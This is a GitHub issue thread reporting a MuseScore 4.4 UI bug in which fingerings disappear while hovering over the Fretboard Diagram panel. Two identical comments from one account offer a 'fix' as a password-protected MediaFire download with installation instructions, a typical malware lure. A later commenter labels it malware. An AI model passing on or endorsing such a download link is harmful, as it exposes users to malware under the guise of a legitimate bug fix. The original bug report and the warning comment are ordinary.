### ISSUE TITLE
In MS4.4's Fretboard Diagram panel hovering the diagram hides fingering visibility

### ISSUE THREAD

**Issue by scorster** [musescore/MuseScore#24367]
### Issue type

UI bug (incorrect info or interface appearance)

### Description with steps to reproduce

1. Open MS4.4
2. New score
3. Add a Fretboard diagram from the pallete
4. Toggle **Show Fingerings** ON
5. Add one or more fingerings

6. Hover over the Fretboard diagram

**Result:** As shown in the attached video, whenever the cursor is over the dialog's fretboard diagram the Fingerings disappear.

### Supporting files, videos and screenshots

https://github.com/user-attachments/assets/4a82d16f-1b99-4f30-93d1-a6d3f6abdf5e

### What is the latest version of MuseScore Studio where this issue is present?

MSS 4.4

### Regression

No.

### Operating system

Mac OS 13.5.2

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JohnodonCode** [comment]
^malware jsyk
